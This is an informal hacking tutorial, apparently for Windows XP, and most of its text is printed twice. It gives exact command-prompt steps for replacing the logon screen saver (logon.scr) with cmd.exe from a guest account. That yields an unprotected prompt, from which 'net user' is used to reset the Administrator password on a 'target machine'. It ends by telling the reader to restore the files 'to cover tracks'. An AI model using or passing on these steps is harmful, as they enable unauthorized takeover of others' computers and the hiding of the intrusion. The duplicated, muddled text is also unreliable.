This tutorial shows how you can get access to Admin Account. The only thing needed here is the guest account.
If you log into a limited account(guest account) on your target machine and open up a dos prompt
then enter this set of commands Exactly in the prompt.
----------------------------------------
If you log into a limited account(guest account) on your target machine and open up a dos prompt
then enter this set of commands Exactly in the prompt.
----------------------------------------
-------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Since in the limited account you can't use net user command
Once this happens if you enter this command
net user password
If the Administrator Account is called Admin and you want the password xxxx enter this
net user Admin xxxx
and this changes the password on Admin machine to xxxx and your in.
dont forget to copy the contents of temphack back into the system32 dir to cover tracks.
Thanx..
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Since in the limited account you can't use net user command
Once this happens if you enter this command
net user password
If the Administrator Account is called Admin and you want the password xxxx enter this
net user Admin xxxx
and this changes the password on Admin machine to xxxx and your in.
dont forget to copy the contents of temphack back into the system32 dir to cover tracks.
Thanx..
